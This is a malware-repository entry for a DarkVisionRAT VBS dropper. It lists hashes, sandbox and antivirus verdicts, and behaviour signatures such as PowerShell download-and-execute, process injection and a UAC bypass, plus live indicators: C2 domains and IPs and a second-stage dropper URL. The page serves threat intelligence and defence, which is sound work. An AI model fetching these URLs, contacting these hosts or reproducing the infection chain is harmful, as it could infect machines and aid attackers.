MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 95a67324a3b360de5e1012587af185aa511e37a347c45ff0ca0a897ca95d25a8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


DarkVisionRAT


Vendor detections: 11


Intelligence 11 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 95a67324a3b360de5e1012587af185aa511e37a347c45ff0ca0a897ca95d25a8
SHA3-384 hash: fe99f366a08c7302b596cf035d611cd08955356f7bce51338cf1ae5a9644ba8a54df2c835b6c3620e843d421ccedf08b
SHA1 hash: 8fbdfa518e03676bdb12e5249bb4b965dd4cdbea
MD5 hash: 27eaadd9646703a7ad6ef2563f0bffd8
humanhash: skylark-nuts-winter-four
File name:Documents of Inquiry.vbs
Download: download sample
Signature DarkVisionRAT
Create hunting rule
File size:1'177'326 bytes
First seen:2026-02-12 14:20:44 UTC
Last seen:Never
File type:Visual Basic Script (vbs) vbs
MIME type:text/plain
ssdeep 384:D7jGihHQnSg2By50zgKdrIumFsjZlQMZ18:d8
Threatray 42 similar samples on MalwareBazaar
TLSH T1D7451665074983C3BC44DFA98A354C0403FCF93A4F3AC699D1AA64FA7B0B43955B768B
Magika txt
Reporter James_inthe_box
Tags:DarkVisionRAT exe vbs

Intelligence

File Origin
# of uploads :
1
# of downloads :
161
Origin country :
US US
Vendor Threat Intelligence
No detections
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/53141/
Detection(s):
SecuriteInfo.com.VBS.Agent-101.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Score:
91.7%
Link:
https://cyber-fortress.com/docs/result/index.php?id=698de1dd76589225f665d48f
Tags:
obfuscate xtreme blic
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-vm base64 fingerprint obfuscated powershell
Link:
https://www.filescan.io/uploads/698de1da2ffccda0976e4b9f/reports/90a9a329-db40-4624-b63c-9c8afdbe3d70/overview
Verdict:
Malicious
Labled as:
PSH/Agent.WL
Link:
https://www.hybrid-analysis.com/sample/95a67324a3b360de5e1012587af185aa511e37a347c45ff0ca0a897ca95d25a8
Verdict:
Malicious
File Type:
vbs
First seen:
2026-02-12T05:38:00Z UTC
Last seen:
2026-02-13T17:23:00Z UTC
Hits:
~100
Detections:
Trojan.JS.SAgent.sb HEUR:Trojan.Script.Generic
Link:
https://opentip.kaspersky.com/95a67324a3b360de5e1012587af185aa511e37a347c45ff0ca0a897ca95d25a8/results?tab=lookup
Result
Threat name:
DarkVision Rat
Create hunting rule
Detection:
malicious
Classification:
troj.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1868463
Signature
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Found evasive API chain (may stop execution after checking mutex)
Found malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for submitted file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Unusual module load detection (module proxying)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected DarkVision Rat
Yara detected Powershell download and execute
Yara detected UAC Bypass using CMSTP
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1868463 Sample: Documents of Inquiry.vbs Startdate: 12/02/2026 Architecture: WINDOWS Score: 100 31 toolz.3utilities.com 2->31 33 uniworldrivercruises-co.uk 2->33 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 16 other signatures 2->53 8 wscript.exe 2->8         started        11 powershell.exe 3 17 2->11         started        signatures3 process4 file5 59 Suspicious powershell command line found 8->59 61 Wscript starts Powershell (via cmd or directly) 8->61 63 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->63 65 2 other signatures 8->65 14 powershell.exe 14 16 8->14         started        27 C:\Users\Public\Downloads\uFcOfTYYGH.vbs, Unicode 11->27 dropped 19 wscript.exe 11->19         started        signatures6 process7 dnsIp8 37 77.83.39.177, 49693, 49696, 80 DINET-ASRU Ukraine 14->37 39 uniworldrivercruises-co.uk 176.123.0.55, 443, 49692 ALEXHOSTMD Moldova Republic of 14->39 29 C:\Users\Public\Downloads\uFcOfTYYGH, JPEG 14->29 dropped 41 Writes to foreign memory regions 14->41 43 Modifies the context of a thread in another process (thread injection) 14->43 45 Injects a PE file into a foreign processes 14->45 21 appidtel.exe 2 1 14->21         started        25 conhost.exe 14->25         started        file9 signatures10 process11 dnsIp12 35 toolz.3utilities.com 104.37.175.235, 3321, 49699, 49700 MAJESTIC-HOSTING-01US United States 21->35 55 Found evasive API chain (may stop execution after checking mutex) 21->55 57 Unusual module load detection (module proxying) 21->57 signatures13
Gathering data
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/95a67324a3b360de5e1012587af185aa511e37a347c45ff0ca0a897ca95d25a8/
Verdict:
Malicious
Threat:
Trojan.JS.SAgent
Link:
https://tip.neiki.dev/file/95a67324a3b360de5e1012587af185aa511e37a347c45ff0ca0a897ca95d25a8
Threat name:
Script-WScript.Trojan.Generic
Create hunting rule
Status:
Suspicious
First seen:
2026-02-12 14:20:53 UTC
File Type:
Binary
AV detection:
6 of 24 (25.00%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=swthgjfdwnqn4xqqcjmhv4mfvjir4n5di7cf74gkbkexzkk5ewua._file
Verdict:
malicious
Label(s):
darkvisionrat
Create hunting rule
Similar samples:
1b44667a41735a6ef7b5f0a5da1146a7a92d1ab053de189483fc5b039f735505
DarkVisionRAT
863ebc5c327b6598f24309490e5241793d119f36704abccc2d28dd1fd76735a8
DarkVisionRAT
965655a4e816f10f193a93474deaa7c93465e84a44e20dae33e5a699651e77c5
DarkVisionRAT
a6e752bb42b49e83d8a7a2edf68cfd5e605185b2508a3ff03eb13aff9130a74a
DarkVisionRAT
aaf5fd4e2f34a1054d0949a9652eaee489dfc4f61a73f39d19ebb8beaf38bc70
DarkVisionRAT
ac681a29bb85fecd8ba6e0f2977f7a1cc20f159023640a536fee08489bb00a77
DarkVisionRAT
be16ae0a2656d0e363c9094cf0ed3f2732b7c398c941c5d4a05944db59974d70
DarkVisionRAT
e81b162c2a88c51fac92ea7050449276128cf48523d92cff2dfe928ff902d904
DarkVisionRAT
eda7a5216e8eba7d8648d7160bf64a09f142cdb24163649693d0347f74a65757
DarkVisionRAT
error
DarkVisionRAT
+ 32 additional samples on MalwareBazaar
Result
Malware family:
n/a
Score:
  10/10
Tags:
execution
Link:
https://tria.ge/reports/260212-rn3x7aes2h/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Process spawned unexpected child process
Malware Config
Dropper Extraction:
https://uniworldrivercruises-co.uk/optimized_MSI.png
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Suspicious File
Score:
0.55
Link:
https://yomi.yoroi.company/submissions/95a67324a3b360de5e1012587af185aa511e37a347c45ff0ca0a897ca95d25a8

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:ClamAV_Emotet_String_Aggregate
Create hunting rule

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/53141/

Comments